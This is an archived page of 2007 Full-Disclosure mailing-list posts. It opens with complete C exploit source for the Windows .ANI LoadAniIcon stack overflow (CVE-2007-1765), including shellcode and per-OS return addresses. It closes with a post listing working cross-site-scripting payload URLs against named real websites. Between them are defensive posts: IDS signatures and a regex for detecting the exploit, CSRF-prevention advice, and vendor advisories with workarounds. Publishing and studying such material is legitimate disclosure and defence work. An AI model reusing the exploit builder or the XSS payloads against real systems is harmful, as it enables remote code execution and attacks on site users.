[Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
*tricking a user into visiting a malicious web page or viewing an email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include
/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";
/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe ";
typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;
TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};
int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;
if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}
printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;
}
fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf("[+] .ANI file succesfully created!\n");
return 0;
}
_
Interest Rates near 39yr lo
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
Actually that's not true. We should be clear that this is *not* the same thing as ViewStateUserKey (which is not enabled by default). EnableEventValidation does provide postback input related protections, but ViewStateUserKey actually ties it to the user session. Without ViewStateUserKey, you will notice the __EVENTVALIDATION nonce will be the same for any two users. With ViewStateUserKey, the value will be unique per user. -Original Message- From: Michael Sutton [mailto:[EMAIL PROTECTED] Sent: Friday, March 30, 2007 3:59 PM To: Chris Weber; pdp (architect); full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd] The EnableEventValidation page directive (enabled by default since .Net 2.0) applies a nonce value for form validation and is also a strong control to prevent CSRF attacks. Michael Sutton Security Evangelist SPI Dynamics http://portal.spidynamics.com/blogs/msutton > -Original Message- > From: Chris Weber [mailto:[EMAIL PROTECTED] > Sent: Friday, March 30, 2007 6:12 PM > To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC Forum'; > 'webappsec @OWASP' > Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries > [ASP.NET crowd] > > Nice article. > > For the ASP.NET crowd out there, the will be even more simple, one line of > code. Set the ViewStateUserKey property in your base class or page and > the > unique token protections (similar to CSRF_Guard) will be provided for you. > > http://msdn2.microsoft.com/en- > us/library/system.web.ui.page.viewstateuserkey > .aspx > > This protection mechanism has been available for many years, since the > Framework 1.1 > > > > > > -Original Message- > From: pdp (architect) [mailto:[EMAIL PROTECTED] > Sent: Friday, March 30, 2007 3:16 AM > To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP > Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries > > http://www.gnucitizen.org/blog/preventing-csrf > > I briefly covered how simple it is to prevent CSRF attacks. Hope that you > find it useful. > > -- > pdp (architect) | petko d. petkov > http://www.gnucitizen.org > > -- > -- > Join us on IRC: irc.freenode.net #webappsec > > Have a question? Search The Web Security Mailing List Archives: > http://www.webappsec.org/lists/websecurity/ > > Subscribe via RSS: > http://www.webappsec.org/rss/websecurity.rss [RSS Feed] > > > -- > -- > Join us on IRC: irc.freenode.net #webappsec > > Have a question? Search The Web Security Mailing List Archives: > http://www.webappsec.org/lists/websecurity/ > > Subscribe via RSS: > http://www.webappsec.org/rss/websecurity.rss [RSS Feed] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v calls for immediate halt to the month of Myspace bugs
To all, Crew-X Security and n3td3v call for the immediate halt of the month of Myspace bugs. Who is n3td3v... http://n3td3v.googlepages.com Our honeypot on Myspace... http://myspace.com/n3td3v Happy April fool(s), n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
On Thu, 29 Mar 2007, Alexander Sotirov wrote: > Today Microsoft released a security advisory about a vulnerability in the > Animated Cursor processing code in Windows: > http://www.microsoft.com/technet/security/advisory/935423.mspx > > It seems like the vulnerability is already exploited in the wild: > http://asert.arbornetworks.com/2007/03/any-ani-file-could-infect-you/ Bleeding Edge Threats made available Snort rule that detects some (all?) exploits using this vulnerability: http://www.bleedingthreats.net/index.php/2007/03/30/ms-ani-exploit-rule-details-emerging/ I don't know if this rule detects all possible exploits or just one particular type. Here is a Firekeeper version of the rule, which can be used to detect sites hosting malicious files: alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;) Rule is triggered for example by the following images: http://www.i5460.net/admin12/2.jpg http://www.i5460.net/admin12/1.jpg Cheers, Jan Wrobel http://firekeeper.mozdev.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] On-going Internet Emergency and Domain Names
There is a current on-going Internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated. This incident is currenly being handled by several operational groups. This past February, I sent an email to the Reg-Ops (Registrar Operations) mailing list. The email, which is quoted below, states how DNS abuse (not the DNS infrastructure) is the biggest unmitigated current vulnerability in day-to-day Internet security operations, not to mention abuse. While we argue about this or that TLD, there are operational issues of the highest importance that are not being addressed. The following is my original email message, elaborating on these above statements. Please note this was indeed just an email message, sent among friends. - Begin quoted message - Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST) From: Gadi Evron To: [EMAIL PROTECTED] Subject: [reg-ops] Internet security and domain names Hi all, this is a tiny bit long. Please have patience, this is important. On this list (which we maintain as low-traffic) you guys (the registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call "The Internet Security Operations Community". We face problems today though, that you can not help us solve under the current setting. But only you can help us coming up with new ideas. Day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can't handle this. I don't blame you. In emergencies, we can only mitigate threats if one of you or yours are in control.. Just a week ago we faced the problem of the Dolphins stadium being hacked and malicious code being put on it: 1. We tracked down all the IP addresses involved and mitigated them (by we I mean also people other than me. Many were involved). 2. We helped the Dolphins Stadium IT staff take care of the malicious code on their web page - Specifically Gary Warner). 3. We coordinated with law enforcement. 4. We coordinated that no one does a press release which will hurt law enforcement. 5. We did a lot more. Including actually convincing a Chinese registrar to pull one of the domains in question. A miracle. There was another domain to be mitigated, unsuccessfully. One thing though - at a second's notice, this could all be for nothing as the DNS records could be updated with new IP addresses. There were hundreds of other sites also infected. Even if we could find the name server admin, some of these domains have as many as 40 NSs. That doesn't make life easy. Then, these could change, too. This is the weakest link online today in Internet security, which we in most cases can't mitigate, and the only mitigation route is the domain name. Every day we see two types of fast-flux attacks: 1. Those that keep changing A records by using a very low TTL. 2. Those that keep changing NS records, pretty much the same. Now, if we have a domain which can be mitigated to solve such emergencies and one of you happen to run it, that's great... However, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. Sorry for the language. ICANN has a lot of policy issues as well, and the good guys there can't help. ICANN has enough trouble taking care of all those who want money for .com, .net or .xxx. All that being said, the current situation can not go on. We can no longer ignore it nor are current measures sufficient. It is imperative that we find some solutions, as limited as they may be. We need to be able to get rid of domain names, at the very least during real emergencies. I am aware how it isn't always easy to distinguish what is good and what is bad. Still, we need to find a way. Members of reg-ops: What do you think can be conceivably done? How can we make a difference which is REALLY needed on today's Internet? Please participate and let me know what you think, we simply can no longer wait for some magical change to happen. Gadi. - End of quoted message - Thousands of malicious domain names and several weeks later, we face the current crisis. The 0day vulnerability is exploited in the wild, and mitigating the IP addresses is not enough. We need to be able to "get rid" of malicious domain names. We need to be able to mitigate attacks on the weakest link - DNS, which are not necessarily solved by DNS-SEC or Anycast. On Reg-Ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem to be on the agenda of those running DNS: 1. A system by which registrars can ackn
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
The EnableEventValidation page directive (enabled by default since .Net 2.0) applies a nonce value for form validation and is also a strong control to prevent CSRF attacks. Michael Sutton Security Evangelist SPI Dynamics http://portal.spidynamics.com/blogs/msutton > -Original Message- > From: Chris Weber [mailto:[EMAIL PROTECTED] > Sent: Friday, March 30, 2007 6:12 PM > To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC Forum'; > 'webappsec @OWASP' > Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries > [ASP.NET crowd] > > Nice article. > > For the ASP.NET crowd out there, the will be even more simple, one line of > code. Set the ViewStateUserKey property in your base class or page and > the > unique token protections (similar to CSRF_Guard) will be provided for you. > > http://msdn2.microsoft.com/en- > us/library/system.web.ui.page.viewstateuserkey > .aspx > > This protection mechanism has been available for many years, since the > Framework 1.1 > > > > > > -Original Message- > From: pdp (architect) [mailto:[EMAIL PROTECTED] > Sent: Friday, March 30, 2007 3:16 AM > To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP > Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries > > http://www.gnucitizen.org/blog/preventing-csrf > > I briefly covered how simple it is to prevent CSRF attacks. Hope that you > find it useful. > > -- > pdp (architect) | petko d. petkov > http://www.gnucitizen.org > > -- > -- > Join us on IRC: irc.freenode.net #webappsec > > Have a question? Search The Web Security Mailing List Archives: > http://www.webappsec.org/lists/websecurity/ > > Subscribe via RSS: > http://www.webappsec.org/rss/websecurity.rss [RSS Feed] > > > -- > -- > Join us on IRC: irc.freenode.net #webappsec > > Have a question? Search The Web Security Mailing List Archives: > http://www.webappsec.org/lists/websecurity/ > > Subscribe via RSS: > http://www.webappsec.org/rss/websecurity.rss [RSS Feed] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
Nice article. For the ASP.NET crowd out there, the will be even more simple, one line of code. Set the ViewStateUserKey property in your base class or page and the unique token protections (similar to CSRF_Guard) will be provided for you. http://msdn2.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey .aspx This protection mechanism has been available for many years, since the Framework 1.1 -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Friday, March 30, 2007 3:16 AM To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries http://www.gnucitizen.org/blog/preventing-csrf I briefly covered how simple it is to prevent CSRF attacks. Hope that you find it useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org Join us on IRC: irc.freenode.net #webappsec Have a question? Search The Web Security Mailing List Archives: http://www.webappsec.org/lists/websecurity/ Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability
> > If you discover a vulnerability in CA products, please report > your findings to vuln at ca dot com, or utilize our "Submit a > Vulnerability" form at > http://www3.ca.com/securityadvisor/vulninfo/submit.aspx. Looks like a vuln is found once a week in C.A products esp in you Backup and Anti-Viri products. 3 are listed currently on your own page http://www3.ca.com/securityadvisor/vulninfo/ and um... http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmc&pst="computer%20associates"; tired of seeing C.A. exploits!!! especially the corporate products, your clients must thank you for providing remote access in EVERY PROGRAM YOU RELEASE ( i know the blackhats do ) please delete these products from your catalog. m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows(CVE-2007-0038)
You really need to check for: RIFF[4 byte file size] <-- The file size can be ignored. Then the next 4 byte after the file size should contain: ACON Then look for: anih and the 4 byte value following it greater than 0x50, this is the stack buffer overflow point. New ANIs can be built with any number of anih chunks and only one of them needs to be larger than 80 bytes decimal. Cheers, Eric Sites, CTO Sunbelt Software -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alexander Sotirov Sent: Friday, March 30, 2007 8:29 PM To: Jan Wrobel Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows(CVE-2007-0038) Jan Wrobel wrote: > I don't know if this rule detects all possible exploits or just one > particular type. Here is a Firekeeper version of the rule, which can > be used to detect sites hosting malicious files: > > alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;) A better way would be to look for all files that start with "RIFF" and contain two copies of the string "anih", the first one followed by the dword 0x24, the second one followed by a dword that's not 0x24. This should detect the exploitation of the stack overflow with no false negatives. To avoid false positives, you'll need code to parse all records in the ANI file and check for more an "anih" record with a size not equal to 0x24. Here's the regexp in Perl (somebody please convert it to a Snort rule) /^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/ Alex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exe vulnerability
CA is aware that functional exploit code was publicized on March 30, 2007 for a CA BrightStor ARCserve Backup Mediasvr.exe vulnerability. We have verified that a high risk vulnerability does exist and we are now working on a patch to address the issue. CA recommends that BrightStor ARCserve Backup users implement the following temporary workaround to mitigate the vulnerability: 1) Rename the "mediasvr.exe" file to a non-functional file name, such as "mediasvc.exe.disable". 2) Then restart the CA BrightStor Tape Engine service. This will disable the command line functionality in the product (i.e. command line utilities such as ca_backup, ca_restore, ca_merge, ca_qmgr, ca_scan, etc will not work). After we have completed our analysis of the issue, we will post an update and patches on the CA SupportConnect website. If additional information is required, please contact CA Technical Support at http://supportconnect.ca.com. If you discover a vulnerability in CA products, please report your findings to vuln at ca dot com, or utilize our "Submit a Vulnerability" form at http://www3.ca.com/securityadvisor/vulninfo/submit.aspx. Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, One CA Plaza, Islandia, NY 11749 Contact http://www3.ca.com/contact/ Legal Notice http://www3.ca.com/legal/ Privacy Policy http://www3.ca.com/privacy/ Copyright (c) 2007 CA. All rights reserved. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
Jan Wrobel wrote: > I don't know if this rule detects all possible exploits or just one > particular type. Here is a Firekeeper version of the rule, which can > be used to detect sites hosting malicious files: > > alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54 > 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 > 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534; > reference:url,http://www.avertlabs.com/research/blog/?p=233; > reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;) A better way would be to look for all files that start with "RIFF" and contain two copies of the string "anih", the first one followed by the dword 0x24, the second one followed by a dword that's not 0x24. This should detect the exploitation of the stack overflow with no false negatives. To avoid false positives, you'll need code to parse all records in the ANI file and check for more an "anih" record with a size not equal to 0x24. Here's the regexp in Perl (somebody please convert it to a Snort rule) /^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/ Alex signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
On 3/30/07, James Matthews <[EMAIL PROTECTED]> wrote: > Now all we need is an exploit... I am thinking why isn't there a Month of > windows bugs.. http://www.securinfos.info/english/the-week-of-vista-bugs.php [en] http://movb.blogspot.com/ [fr] -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution Vulnerability
TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution
http://www.tippingpoint.com/security/advisories/TSRT-07-03.html
March 30, 2007
-- CVE ID:
CVE-2006-5820
-- Affected Vendor:
America Online
-- Affected Products:
America Online 9.0 Security Edition
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 6, 2006 by Digital Vaccine protection
filter ID 4553. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of America Online with Microsoft Internet
Explorer. User interaction is required to exploit this vulnerability in
that the target must visit a malicious page.
The specific flaw exists in the LinkSBIcons() method exposed through
the ActiveX control 'Sb.SuperBuddy.1' with the following CLSID:
189504B8-50D1-4AA8-B4D6-95C8F58A6414
The affected control implements the IObjectSafety interface and
therefore allows a web site to invoke the control under default
Internet Explorer settings without any further user interaction. The
vulnerable method is defined as:
int LinkSBIcons(IUnknown *interface)
As the method accepts an unchecked user-controlled value specifying a
pointer to an object, a subsequent function dereference is completely
under attacker control. This can easily lead to arbitrary code
execution under the context of the logged in user.
It is important to note that many PCs ship with this vulnerable
component by default, including Dell and Hewlett-Packard among others.
Since AOL is addressing this issue as an update through their internet
service, many users are left without any recourse for mitigation.
Concerned users can specify a "kill bit" for the affected control to
prevent it from loading within Internet Explorer. To do so, create the
following registry key:
HKEY_LOCAL_MACHINE\
SOFTWARE\
Microsoft\
Internet Explorer\
ActiveX Compatibility\
{189504B8-50D1-4AA8-B4D6-95C8F58A6414}
With the value 'Compatibility Flags' set to 0x400.
-- Vendor Response:
America Online has issued an update to correct this vulnerability as of
3/29/2007. The update is automatically applied the next time users log
into the AOL service.
-- Disclosure Timeline:
2006.07.18 - Vulnerability reported to vendor
2006.11.06 - Digital Vaccine released to TippingPoint customers
2007.03.30 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Cody Pierce, Tipping Point Security
Research Team.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
On Fri, 2007-03-30 at 12:46 -0700, James Matthews wrote: > I am thinking why isn't there a Month of windows bugs.. LOL! :-) Simply because that's what the other 11 months in a year are for. -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200703-26 ] file: Integer underflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: file: Integer underflow Date: March 30, 2007 Bugs: #171452 ID: 200703-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer underflow vulnerability has been reported in file allowing for the user-assisted execution of arbitrary code. Background == file is a utility that guesses a file format by scanning binary data for patterns. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 sys-apps/file < 4.20>= 4.20 Description === Jean-Sébastien Guay-Leroux reported an integer underflow in file_printf function. Impact == A remote attacker could entice a user to run the "file" program on a specially crafted file that would trigger a heap-based buffer overflow possibly leading to the execution of arbitrary code with the rights of the user running "file". Note that this vulnerability could be also triggered through an automatic file scanner like amavisd-new. Workaround == There is no known workaround at this time. Resolution == Since file is a system package, all Gentoo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=sys-apps/file-4.20" References == [ 1 ] CVE-2007-1536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1536 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-26.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpMPYrEMtXVd.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
Now all we need is an exploit... I am thinking why isn't there a Month of windows bugs.. On 3/30/07, 3APA3A <[EMAIL PROTECTED]> wrote: Dear Michaі Majchrowicz, This image also effectively exploits stack overflow (?) in FastStone Image Viewer 2.8, EIP/EBP is 0x41414141. --Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]: MM> Everytime you try to turn on the slideshow with a JPG file in the MM> folder you get BSoD MM> (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by MM> turningonthe slideshow in the following directory: MM> c:Windows\Web\Wallpaper\ Since this case cannot be connect with -- ~/ZARAZA http://securityvulns.com/ Патриотизм - это та же религия. (Твен) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
Things will only get worse! On 3/30/07, James Rankin <[EMAIL PROTECTED]> wrote: hackers blitz into Tk-Maxx - unfortunate... http://news.bbc.co.uk/1/hi/business/6508983.stm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buy 0day vulnerability
nooo i hear darth vader ! ;) Max maybe it just an invite to the dark side of the force On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote: > > Correct me if I'm wrong, but wouldn't that defeat the point of Full > Disclosure? Correct him if I'm right, but wouldn't that defeat the point of Full Disclosure? -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] A lot of XSS
Blog-Entry: http://www.hboeck.de/item/468 http://www.netbeat.de/bestellen/domaincheck.html?alert(1) http://www.netbeat.de/support/kommentare.html?name=";>alert(1) http://www.symlink.ch/users.pl?unickname=";>alert(1) http://www.stuttgart.de/sde/search.php?search=%22>alert%281%29 http://www.holidayranking.de/search.html?searchSearchString=";>alert(1) http://www.freecity.de/suche/index.phtml?gosearch=yes&words=";>alert(1) http://search.netdoktor.com/results.html?qt=";>alert(1)&la=de http://www.vfb.de/de/suche/index.php?words=";>alert(1) http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt=";>alert(1) And some with post: http://www.adac.de/Search/SearchResult/RW_SearchResult.asp";> http://www.tu-berlin.de/www/software/java/cgi-bin/search.pl";> -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber: [EMAIL PROTECTED] pgpr70zbLB1Hh.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
